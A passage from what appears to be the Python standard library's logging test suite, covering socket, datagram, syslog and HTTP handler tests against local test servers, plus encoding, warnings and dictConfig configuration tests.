# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
